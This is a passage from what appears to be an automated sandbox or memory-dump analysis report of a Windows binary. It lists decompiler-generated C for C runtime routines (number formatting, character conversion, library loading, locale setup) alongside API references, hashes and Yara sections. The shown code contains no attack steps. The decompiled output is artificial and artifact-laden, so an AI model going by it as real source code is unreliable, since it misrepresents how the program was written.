				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E1F1F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6E2275C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6E2275C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6E1E39C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6E2275C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6E227640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6E227640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6E227640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6E20F648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6E2278B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6E202281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6E20215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

APIs

_strrchr.LIBCMT ref: 6E20F3D0
__alldvrm.LIBCMT ref: 6E20F5D1
__alldvrm.LIBCMT ref: 6E20F5F3

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: d759fa54c56c1364d42419361a8a0384893c51045b3d0ea6dcad755a8202193e
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: E8A14572A9428B9FF711CFA8C8907ABBFA6EF45314F2441A9D9949B2C1C7348941C758

Uniqueness

Uniqueness Score: -1.00%

Function 6E216102, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E216102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_v8 =  *0x6e28506c ^ _t69;
				E6E1F1F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6E1DF8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6E1E39C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6E1CDEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6E20F26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6E1E01B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}

0x6e216102
0x6e216111
0x6e21611d
0x6e216122
0x6e216127
0x6e21612c
0x6e21612c
0x6e21612f
0x6e216131
0x6e216131
0x6e216136
0x6e21614f
0x6e216155
0x6e21615a
0x6e2161f9
0x6e2161fd
0x6e216202
0x6e216202
0x6e21621e
0x6e21621e
0x6e216160
0x6e216163
0x6e216168
0x6e21616c
0x6e2161b8
0x6e2161ba
0x6e2161bc
0x6e2161c1
0x6e2161d8
0x6e2161e0
0x6e2161f0
0x6e2161f0
0x6e2161e0
0x6e2161f2
0x6e2161f3
0x00000000
0x6e2161f8
0x6e21616e
0x6e216173
0x6e216175
0x6e216177
0x6e216177
0x6e21617f
0x6e21619c
0x6e2161a6
0x6e2161ab
0x00000000
0x00000000
0x6e2161ad
0x6e2161b3
0x6e2161b3
0x00000000
0x6e2161b3
0x6e216183
0x6e216187
0x6e21618c
0x6e216190
0x00000000
0x00000000
0x6e216192
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E230EA8,00000000,00000000,008B018B,6E20DA1E,?,00000004,00000001,6E230EA8,0000007F,?,008B018B,00000001), ref: 6E21614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2161D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2161EA
__freea.LIBCMT ref: 6E2161F3

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: c952fcd61241193bdbb7c107878c4bd25e005f2ef3961c9aff51065ccf297142
Instruction ID: 313a0dff0af59cffe074e0cbc09540bf81cb6fb413a2bcaa9bbd01627d439ec2
Opcode Fuzzy Hash: c952fcd61241193bdbb7c107878c4bd25e005f2ef3961c9aff51065ccf297142
Instruction Fuzzy Hash: 5D31CD72A1021BAFDF14CFA4CC84DEF3BAAEB40714F084568ED14D6251EB35CA95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E213E7F, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6E213E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6e287908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6e231690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				asm("sbb eax, eax");
				return  ~(_t24 + 1) & _t24;
			}

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue), ref: 6E213EB1
GetLastError.KERNEL32(?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue,6E231C58,FlsSetValue,00000000,00000364,?,6E20D6D1), ref: 6E213EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue,6E231C58,FlsSetValue,00000000), ref: 6E213ECB

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 437c17e0f59cbf3e74be3753f95f61e08cae6bf20981328e54affb5b95798733
Instruction ID: 5e8c07c179483aad5171b3e6edcb8e5f2ac0097f718acaa34ae9884cbdbf6595
Opcode Fuzzy Hash: 437c17e0f59cbf3e74be3753f95f61e08cae6bf20981328e54affb5b95798733
Instruction Fuzzy Hash: AA01B53226D72B9FCB2149A98C4D98677DBBF167B1B160520EA05D3540D721D900CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D14EC, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1D14EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E1E00AC(0x6e228a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E1DF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1A1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1A1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E1D0110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1A14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E1E0075(_t15);
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1D14F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1D1528

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1D1539

Part of subcall function 6E1D0110: __EH_prolog3.LIBCMT ref: 6E1D0117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1D154A

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 09801edd4351d56ff27bf824c34f5b93c5816030e507829f5ec31fbba3fcaf08
Instruction ID: 53d331131ba17ee63f7f5e838253dba2ed86069bce952739994989efe6e1f952
Opcode Fuzzy Hash: 09801edd4351d56ff27bf824c34f5b93c5816030e507829f5ec31fbba3fcaf08
Instruction Fuzzy Hash: 9E0181B5B4021A9FDB01CBECC850AEEBB79AF14794F20051AE515AB280DF748AC9D791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1558, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1D1558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E1E00AC(0x6e228a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E1DF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1A1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1A1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E1D0143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1A14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E1E0075(_t15);
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1D155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1D1594

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1D15A5

Part of subcall function 6E1D0143: __EH_prolog3.LIBCMT ref: 6E1D014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1D15B6

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 922e6cd43874a16a24686a89619abd70a53dfc0f5f027af2496ef43d53be31c1
Instruction ID: 4184fddacc040caa6f9e993d9ac516402ecf26ecb0239aff4cf00e30c4eba92e
Opcode Fuzzy Hash: 922e6cd43874a16a24686a89619abd70a53dfc0f5f027af2496ef43d53be31c1
Instruction Fuzzy Hash: FD01F9B5A0021ADFCB00CFE8C950BEE7B78AF14790F200519E515AB280CFB48AC9DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC229, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1DC229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E1E00AC(0x6e228a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E1DF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1A1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1A1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E1DBD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1A14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E1E0075(_t15);
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DC230
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1DC265

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1DC276

Part of subcall function 6E1DBD9F: __EH_prolog3.LIBCMT ref: 6E1DBDA6

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1DC287

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 79fbf8da048731351c9cb2f564dc55d38f7ee3500a8c6b8e6c1a163c319d6128
Instruction ID: aadacd92615c85e6bbd36b7eec3b2774e3f06af080135d88ad3838fc8ed11430
Opcode Fuzzy Hash: 79fbf8da048731351c9cb2f564dc55d38f7ee3500a8c6b8e6c1a163c319d6128
Instruction Fuzzy Hash: 5101A475A0021ADFDF40DFE8C850BEEBB79AF54794F20091AE515AB280CF744AC9D790

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A18A0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A18A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6E1E00AC(0x6e227d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
						_t30 = E6E1DF8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6E1A1450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6E1A1703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6e22a9c0;
						E6E1A1928(_t30, _t16);
						 *_t28 = _t30;
						E6E1A14CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6E1E0075(_t12);
			}

0x6e1a18a7
0x6e1a18ac
0x6e1a18b1
0x6e1a18b3
0x6e1a18b6
0x6e1a18bf
0x6e1a18c2
0x6e1a18c8
0x6e1a18d5
0x6e1a18da
0x6e1a18e1
0x6e1a18e7
0x6e1a18ef
0x6e1a18f1
0x6e1a18f1
0x6e1a18b6
0x6e1a18f8
0x6e1a18fe

APIs

__EH_prolog3.LIBCMT ref: 6E1A18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1A18D5

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

ctype.LIBCPMT ref: 6E1A18E7

Part of subcall function 6E1A1928: __Getctype.LIBCPMT ref: 6E1A1937
Part of subcall function 6E1A1928: __Getcvt.LIBCPMT ref: 6E1A1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1A18F1

Part of subcall function 6E1A14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1A14F5
Part of subcall function 6E1A14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1566

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 53036a5850edb24cdde5f7d1dcbe9aeb8f39c0c0ac958ff0aa07e9a312cf2ccc
Instruction ID: 288e5d56354dac17ebab70982f75deb1a1a5184dc4a147f8ca348240d6528b30
Opcode Fuzzy Hash: 53036a5850edb24cdde5f7d1dcbe9aeb8f39c0c0ac958ff0aa07e9a312cf2ccc
Instruction Fuzzy Hash: 34F03AB96006199FDB10DFE8C451BFDB7A9AF40765F20481DE3095B280DF745AC8EB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1CB968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6E1E00E0(0x6e2286b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
